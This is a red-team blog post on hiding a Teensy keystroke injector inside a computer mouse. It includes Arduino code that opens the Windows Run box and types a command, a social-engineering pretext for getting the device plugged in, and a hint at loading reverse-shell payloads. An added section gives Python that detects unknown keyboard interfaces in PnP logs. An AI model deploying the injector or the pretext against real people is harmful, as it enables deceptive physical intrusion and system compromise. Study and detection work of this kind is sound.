The Red Team's Ratatouille

:begin Introduction

Plug and Prey: Malicious USB Devices by Irongeek at Shmoocon, BadUSB by Karsten Nohl at Black Hat, and the Rubber Ducky by Hak5 are all super interesting concepts, and they are leveraged in every Red Team engagement conducted by a Red Team Operator. Any such exploitation requires a good amount of social engineering. I recommend that people exhaust every possible trick in the book to compromise the organization from its external network before attempting to breach physical security.

The use of a malicious USB is quite obvious, and you can't actually walk up to the victim and ask him to plug in the USB. OK! So you succeed in social engineering him into letting you plug in the USB drive? Good luck explaining the command prompt opening, random characters getting entered and the command prompt closing on its own. Yes! Even if the execution takes only half a second, the human eye can see at a speed of 60 fps, according to research of course. Obviously, you succeed if some idiot manages to leave his system unlocked (which you'll have to lurk around and wait for).

A malicious mouse attack, or what I like to call The Red Team's Ratatouille, gives you the perfect excuse as an attacker. Zero wait time. Just go up to your victim and ask, "Can I check if this mouse is working on your system?" Assuming you are a red teamer and know how to speak to people, you'll end up with a system in your credential bank. :) From here, happy hacking!

:begin Technical Details

This attack doesn't vary a lot from BadUSB with respect to concepts. We simply stuff our microcontroller device into the body of a mouse.

:goto Ingredients


  • Teensy 3.2 Microcontroller

  • Arduino IDE

  • Teensyduino software

  • Basic programming-fu

  • A mouse (it need not actually work)

  • MicroUSB cable (to connect the Teensy to the USB port; black is the preferred color)

  • Basic Social Engineering skills

:goto Cooking

:goto Building an exploit

First and foremost, let us not forget USBdriveby, the code written by Samy Kamkar. Quite a lot of people use this code with their Teensy device. Another tool used is the Social-Engineer Toolkit (SET), which gives you a PowerShell payload that you would need to execute to pwn the system.

But what is a hacker without the knowledge of what he does? So, before starting, I hope you know some basic Arduino programming. This sample code will open Notepad and type "You have been Hax0red" into it. To begin, we build the algorithm that we want to program (manual method).

1. Press Win+R to open the "Run" window.
2. Release the keys.
3. Type the string "notepad" into this window.
4. Press Enter.
5. Type the string "You have been Hax0red".

Base Teensy Code

```cpp
void setup() {
  // Runs once when the Teensy is plugged in; the keystrokes go here.
}

void loop() {
  // Nothing to repeat.
}
```

Run Window Function

```cpp
#define ascii_println Keyboard.println   // Types a string followed by Enter

void runTheExe(const char *SomeCommand)
{
  Keyboard.set_modifier(128);   // Set modifier key: 128 is the Windows (GUI) modifier bit
  Keyboard.set_key1(KEY_R);     // Set key 'r'
  Keyboard.send_now();          // Action of pressing Windows + R
  Keyboard.set_modifier(0);     // Setting modifier to 0
  Keyboard.set_key1(0);         // Setting key to 0
  Keyboard.send_now();          // Action of releasing the keys
  delay(1500);                  // Delay to let you see what happens. Change this to a lower value during real operations.
  ascii_println(SomeCommand);   // Send a string as input, followed by Enter, which runs it
}
```

As can be seen above, we now need to send a string (in this case 'notepad'), and it will be run from the Run window. Accordingly, we now define the setup() function.

```cpp
void setup() {
  delay(100);
  runTheExe("notepad");                    // We open Notepad
  delay(100);                              // Only to help you feel something is being done
  // Enter the payload below
  ascii_println("You have been Hax0red");  // We type the string that we wanted
}
```

Now of course, this could be weaponized in more harmful ways, which I will leave to you Red Teamers out there to attempt. I love to have my Teensy with reverse shell code. This code can be saved on a Raspberry Pi and weaponized every time, depending on your client environment.

Full Code

```cpp
#define ascii_println Keyboard.println   // Types a string followed by Enter

void runTheExe(const char *SomeCommand); // Prototype, so setup() can call it before its definition

void setup() {
  delay(100);
  runTheExe("notepad");                    // Open Notepad via the Run window
  delay(100);
  // Enter the payload below
  ascii_println("You have been Hax0red");  // Type the string into Notepad
}

void loop() {
  // Nothing to repeat
}

void runTheExe(const char *SomeCommand)
{
  Keyboard.set_modifier(128);   // Windows (GUI) modifier bit
  Keyboard.set_key1(KEY_R);     // Key 'r'
  Keyboard.send_now();          // Press Windows + R
  Keyboard.set_modifier(0);     // Clear the modifier
  Keyboard.set_key1(0);         // Clear the key
  Keyboard.send_now();          // Release the keys
  delay(1500);                  // Wait for the Run window to appear
  ascii_println(SomeCommand);   // Type the command and press Enter
}
```
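On the host, a device like the one above is just a new keyboard that enumerates the moment the "mouse" is plugged in. As an added example (not part of the original post), the following detection logic runs over Windows Kernel-PnP "device configured" events and flags any keyboard-class interface from a vendor not on the organisation's keyboard allowlist, noting when the same VID/PID also exposes a mouse interface, which is what a microcontroller hidden in a mouse body looks like. The log lines, instance paths, PID and the allowlist are constructed; VID 16C0 is the vendor ID Teensy boards enumerate with, and the two class GUIDs are the standard Windows keyboard and mouse setup classes.

```python
import re
from collections import defaultdict

# Constructed sample lines shaped like Windows System-log Kernel-PnP event 400
# ("Device ... was configured") messages. Illustrative only, not real captured logs.
SAMPLE_LOG = """\
Kernel-PnP 400 Device HID\\VID_046D&PID_C077\\7&1a2b&0&0000 was configured. Driver Name: msmouse.inf Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Kernel-PnP 400 Device HID\\VID_16C0&PID_0487&MI_01\\8&2c3d&0&0000 was configured. Driver Name: keyboard.inf Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Kernel-PnP 400 Device HID\\VID_16C0&PID_0487&MI_02\\8&2c3d&0&0001 was configured. Driver Name: msmouse.inf Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Kernel-PnP 400 Device HID\\VID_045E&PID_0750\\6&3e4f&0&0000 was configured. Driver Name: keyboard.inf Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
"""

# Windows setup-class GUIDs for keyboards and mice.
KEYBOARD_CLASS = "4d36e96b-e325-11ce-bfc1-08002be10318"
MOUSE_CLASS = "4d36e96f-e325-11ce-bfc1-08002be10318"
# Vendor IDs the organisation has approved for keyboards (constructed allowlist).
APPROVED_KEYBOARD_VIDS = {"045E", "046D"}

EVENT_RE = re.compile(
    r"Device (?:HID|USB)\\VID_([0-9A-Fa-f]{4})&PID_([0-9A-Fa-f]{4})\S* was configured\."
    r".*Class Guid: \{([0-9A-Fa-f-]{36})\}"
)

def parse_events(log):
    """Yield (vid, pid, class_guid) for each device-configured line."""
    for line in log.splitlines():
        m = EVENT_RE.search(line)
        if m:
            yield m.group(1).upper(), m.group(2).upper(), m.group(3).lower()

def suspicious_keyboards(log):
    """Return sorted (vid, pid, reasons) for every non-approved vendor that
    presents a keyboard interface; note if it also presents a mouse interface."""
    classes = defaultdict(set)
    for vid, pid, guid in parse_events(log):
        classes[(vid, pid)].add(guid)   # group interfaces of one physical device
    findings = []
    for (vid, pid), guids in sorted(classes.items()):
        if KEYBOARD_CLASS not in guids or vid in APPROVED_KEYBOARD_VIDS:
            continue
        reasons = ["non-approved vendor presents a keyboard interface"]
        if MOUSE_CLASS in guids:
            reasons.append("also presents a mouse interface")
        findings.append((vid, pid, reasons))
    return findings

if __name__ == "__main__":
    for vid, pid, reasons in suspicious_keyboards(SAMPLE_LOG):
        print(f"VID_{vid} PID_{pid}: {', '.join(reasons)}")
```

The same grouping works on a live feed of PnP events; a keyboard interface appearing on a device the user believes is a mouse is the signal to investigate.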